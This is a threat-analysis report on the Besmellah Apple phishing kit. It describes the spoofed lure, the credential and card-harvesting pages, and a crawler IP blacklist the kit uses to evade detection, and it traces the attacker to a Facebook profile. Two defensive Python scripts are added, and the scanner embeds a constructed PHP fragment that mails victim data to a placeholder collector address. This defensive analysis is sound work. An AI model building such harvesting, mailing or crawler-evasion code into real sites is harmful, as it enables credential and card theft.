Besmellah Apple phishing kit
Introducing the campaign
In the recent past, Apple customers have been among the favourite targets of cyber attacks, especially in the form of phishing. Cybercriminals are generally after personal and sensitive data, including bank account details.
Only last month, the so-called "Celebrity gate", also named "Fappening", drew significant media attention, as the privacy of dozens of international celebrities, all Apple clients, was violated and hundreds of personal, sometimes intimate, pictures were made public.
The media were very quick to put Apple under the spotlight, blaming supposed vulnerabilities, specifically in the "Find my iPhone" feature.
According to the company, though, the incidents were the result of specific attacks targeting its customers and aimed at stealing their personal and account details.
Apple has been increasingly targeted by criminals, and the recent appearance of specific, pre-packaged "phishing kits", widely available on the internet, leaves companies (by no means limited to Apple) and their clients significantly more exposed to malicious activity.
Within this context, a new kit called "Besmellah" has been identified, the malicious end-to-end process analysed and the identity of the person responsible revealed. The attack was carried out by a young attacker who was interested in the bank account and credit card details of Apple customers.
Threat Analysis
The analysis of the threat showed that the attack takes place in a three-step process.
As is common for the "Besmellah kit", the attack starts with a fraudulent email sent to the recipient from an apparently legitimate support address (support@apple.com).
In the body of the email the attacker refers to an unspecified technical issue and urges the recipient to follow a link in order to validate the account and avoid its closure.
In these cases, spoofing the sender address tends to be successful because recipients are more inclined to lower their guard and trust the link. It is also worth mentioning the use of the popular URL-shortening service "Bitly", which allows the malicious link to bypass anti-phishing tools and hides the link's real destination.
Following the link, the victim is redirected to a web page where they are asked to enter their account credentials. The form and web page resemble the legitimate ones in great detail, although the domain used to host the page is clearly not legitimate.
In this specific case, the website used to host the pages belonged to an Indian professional; it had previously been compromised through known vulnerabilities in its WordPress CMS and was then used to install the kit.
Once the credentials are submitted, an email is forwarded to the attacker. This email contains the victim's IP address along with the date and time of the submission.
As a second step, the victim is asked to fill in a second form providing other key information linked to their account, such as name, address, phone number, driving licence and credit card details (number, expiry date, CVV). As in step one, as soon as the information is submitted the attacker receives an email with all these details plus the geolocated IP address of the victim.
In the third and last step, the victim is redirected to the legitimate domain, in this case Apple's "itunesconnect.apple.com".
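The three steps above rest on two traits a mail gateway can look for before a user ever clicks: a visible sender that does not match the envelope (the spoofed support@apple.com address) and a shortened link that hides its landing page. The following Python script is an added example, not code from the original report: it triages a raw message for those traits and for the "validate or lose your account" pressure. Both sample messages are constructed, and the short link, addresses and SPF text in them are placeholders.

```python
"""Triage a raw e-mail for the traits of the lure described in the report:
a spoofed support@ sender, a URL-shortener link that hides the landing page,
and 'validate your account or it will be closed' pressure.  Added example,
not code from the original report; sample messages below are constructed."""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Public URL shorteners: the visible link says nothing about where it lands.
SHORTENER_HOSTS = {"bit.ly", "bitly.com", "j.mp", "tinyurl.com", "goo.gl", "t.co", "ow.ly"}
# Wording typical of account-closure lures.
URGENCY_PATTERNS = (r"avoid (?:its |account )?closure", r"within \d+ hours", r"\bsuspend")

# Constructed lure modelled on the report's description (addresses and link are placeholders).
SAMPLE_LURE = """\
Return-Path: <bounce@mail-relay.example.net>
Received-SPF: fail (example.org: domain of apple.com does not designate 203.0.113.10 as permitted sender)
From: Apple Support <support@apple.com>
To: victim@example.org
Subject: Your Apple ID needs verification
Content-Type: text/html; charset=utf-8

<html><body>
<p>We detected a technical issue with your account.</p>
<p>Please <a href="http://bit.ly/PLACEHOLDER">verify your Apple ID</a> within 24 hours to avoid closure.</p>
</body></html>
"""

# Constructed legitimate notice for comparison: aligned sender headers, first-party link.
SAMPLE_CLEAN = """\
Return-Path: <bounce@example.com>
Received-SPF: pass (example.org: domain of example.com designates 198.51.100.5 as permitted sender)
From: Example Support <support@example.com>
To: victim@example.org
Subject: Your monthly statement is ready
Content-Type: text/html; charset=utf-8

<html><body>
<p>Your statement is available at <a href="https://www.example.com/account/statements">our site</a>.</p>
</body></html>
"""


def _domain(header_value):
    """Lower-cased domain of an address header, or '' if none."""
    return parseaddr(str(header_value or ""))[1].rpartition("@")[2].lower()


def _body_text(msg):
    """Decoded text of the preferred body part (HTML first, then plain)."""
    part = msg.get_body(preferencelist=("html", "plain"))
    return part.get_content() if part is not None else ""


def extract_links(msg):
    """Every href target and bare URL in the body, de-duplicated in order."""
    text = _body_text(msg)
    links = re.findall(r'href=["\']([^"\']+)["\']', text, flags=re.I)
    links += re.findall(r'https?://[^\s"\'<>]+', text)
    return list(dict.fromkeys(links))


def triage(raw_message):
    """Return (code, detail) findings; an empty list means nothing suspicious was seen."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    from_domain = _domain(msg.get("From"))
    return_path_domain = _domain(msg.get("Return-Path"))
    # Spoofing check: the bounce address should belong to the same domain as the visible sender.
    if return_path_domain and return_path_domain != from_domain:
        findings.append(("sender-mismatch", f"From={from_domain} Return-Path={return_path_domain}"))
    spf = re.match(r"\s*(\w+)", str(msg.get("Received-SPF", "")))
    if spf and spf.group(1).lower() in ("fail", "softfail"):
        findings.append(("spf-" + spf.group(1).lower(), from_domain))
    for link in extract_links(msg):
        host = (urlparse(link).hostname or "").lower()
        if host in SHORTENER_HOSTS:
            findings.append(("shortened-link", link))
        elif host and host != from_domain and not host.endswith("." + from_domain):
            findings.append(("off-domain-link", link))
    body = _body_text(msg)
    for pattern in URGENCY_PATTERNS:
        if re.search(pattern, body, flags=re.I):
            findings.append(("urgency", pattern))
            break
    return findings


if __name__ == "__main__":
    for name, raw in (("lure", SAMPLE_LURE), ("clean", SAMPLE_CLEAN)):
        print(name, triage(raw) or "no findings")
```

On the constructed lure the script reports the From/Return-Path mismatch, the SPF failure, the bit.ly link and the closure threat; on the clean notice it reports nothing. None of these checks needs the short link to be resolved, which is the point: the shortener defeats reputation lookups on the final URL, but it cannot hide the fact that a shortener was used.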
One of the aspects that makes the "Besmellah kit" very effective is its use of a blacklist of IP addresses belonging to the most popular search engines and spider bots, which crawl the web to trace and track phishing threats; requests from those addresses are rejected, so the phishing pages stay out of their sight.
Identification of the attacker
The process of identifying the attacker started from the analysis of the hacked website.
Within its directory structure a zip archive was detected; the archive hosted the fully functioning kit used for the operation:
The analysis of the source code revealed the email address the attacker was using to receive the account and the victims' personal information:
Performing a Facebook search for that email address, the association with a specific account was identified:
The analysis of the profile linked to the account made it possible to discover pictures and the attacker's personal information: male, of Tunisian origin, young and very interested and active in spamming and hacking activities.
In addition, the intentions of the attacker were clear given that he is part of several organizations known for their spamming activities: these groups share information as well as strategies to obtain sensitive information and launch cyber attacks.
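The investigation above recovered the kit from a zip archive left in the compromised site and pulled the collector address out of its source; the earlier section also noted the kit's blacklist of crawler IP addresses. A site owner or incident responder can look for exactly those artefacts on a suspect WordPress host. The Python scanner below is an added example and not code from the report or the kit: it walks a web root, reads PHP files and the members of any zip archive in place, and flags a hardcoded recipient next to a mail() call (data exfiltration by e-mail) and a visitor-IP comparison against a literal address list (crawler blocklist). The demo web root, the kit fragment it contains, the collector address and the RFC 5737 prefixes are all constructed.

```python
"""Scan a web root for the artefacts the investigation found on the compromised WordPress host:
a zipped phishing kit, PHP that mails captured data to a hardcoded address, and a
visitor-IP blocklist used to keep search-engine crawlers away from the pages.
Added example, not code from the original report; the demo site is constructed."""
import re
import tempfile
import zipfile
from pathlib import Path

HARDCODED_EMAIL = re.compile(r'["\']([\w.+-]+@[\w-]+(?:\.[\w-]+)+)["\']')
MAIL_CALL = re.compile(r"\bmail\s*\(")
REMOTE_ADDR = re.compile(r'\$_SERVER\s*\[\s*["\']REMOTE_ADDR["\']\s*\]')
# Three or more quoted dotted-IPv4 addresses or prefixes in one literal list.
IP_LIST = re.compile(r'(?:["\']\d{1,3}(?:\.\d{1,3}){1,3}\.?["\']\s*,?\s*){3,}')

# Constructed fragment containing only the traits the scanner looks for; the crawler
# prefixes are RFC 5737 documentation ranges and the recipient is a placeholder.
KIT_FRAGMENT = """<?php
$ip = $_SERVER['REMOTE_ADDR'];
$crawlers = array("192.0.2.", "198.51.100.", "203.0.113.");
$to = "collector@example.net";
mail($to, "result", "ip=" . $ip);
"""


def classify_php(source):
    """Return (indicator set, sorted hardcoded recipient addresses) for one PHP source."""
    indicators = set()
    recipients = sorted(set(HARDCODED_EMAIL.findall(source)))
    if MAIL_CALL.search(source) and recipients:
        indicators.add("exfil-by-mail")            # captured data mailed to a fixed address
    if REMOTE_ADDR.search(source) and IP_LIST.search(source):
        indicators.add("visitor-ip-blocklist")     # visitor IP compared against a literal list
    return indicators, recipients


def scan_webroot(root):
    """Walk a web root; report PHP files and zip archives showing kit indicators."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        suffix = path.suffix.lower()
        if suffix == ".php":
            indicators, recipients = classify_php(path.read_text(errors="replace"))
            if indicators:
                findings.append({"path": path.relative_to(root).as_posix(),
                                 "indicators": indicators, "recipients": recipients})
        elif suffix == ".zip" and zipfile.is_zipfile(path):
            # Inspect archive members in place, so the kit need not be extracted to be classified.
            indicators, recipients = set(), set()
            with zipfile.ZipFile(path) as archive:
                php_members = [n for n in archive.namelist() if n.lower().endswith(".php")]
                for name in php_members:
                    member_ind, member_rcpts = classify_php(
                        archive.read(name).decode("utf-8", errors="replace"))
                    indicators |= member_ind
                    recipients.update(member_rcpts)
            if php_members:
                indicators.add("archived-php-kit")
                findings.append({"path": path.relative_to(root).as_posix(),
                                 "indicators": indicators, "recipients": sorted(recipients)})
    return findings


def build_demo_site():
    """Create a throwaway web root mimicking the report's layout: a benign index.php,
    the unpacked kit under wp-content/uploads/, and the zip archive it came from."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    kit_dir = root / "wp-content" / "uploads" / "ap"
    kit_dir.mkdir(parents=True)
    (kit_dir / "verify.php").write_text(KIT_FRAGMENT)
    with zipfile.ZipFile(root / "wp-content" / "uploads" / "kit.zip", "w") as archive:
        archive.writestr("ap/verify.php", KIT_FRAGMENT)
        archive.writestr("ap/index.html", "<html></html>\n")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_demo_site()):
        print(finding["path"], sorted(finding["indicators"]), finding["recipients"])
```

Run against the demo root, the scanner stays silent on index.php and reports both the unpacked verify.php and the kit.zip archive, each with the collector address that would be the starting point for the kind of attribution described above. The recipient address and the blocklist are also the two values a responder should preserve from a real host, since the one identifies the operator and the other explains why the pages never appeared in search-engine or anti-phishing feeds.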
Conclusion
The analysis of this operation once again showed how dangerous phishing activities can be. These threats are on the rise and pose a significant risk to individuals and organizations alike.
The availability on the internet of easy-to-use, pre-packaged tools such as "Besmellah" represents a very dangerous incentive for young, perhaps less experienced attackers to commit unlawful and dangerous activities.
To counter these malicious activities, companies need to define and implement stricter risk management policies, as well as adopt specific tools to prevent attacks and defend both their critical digital infrastructure and their customer base.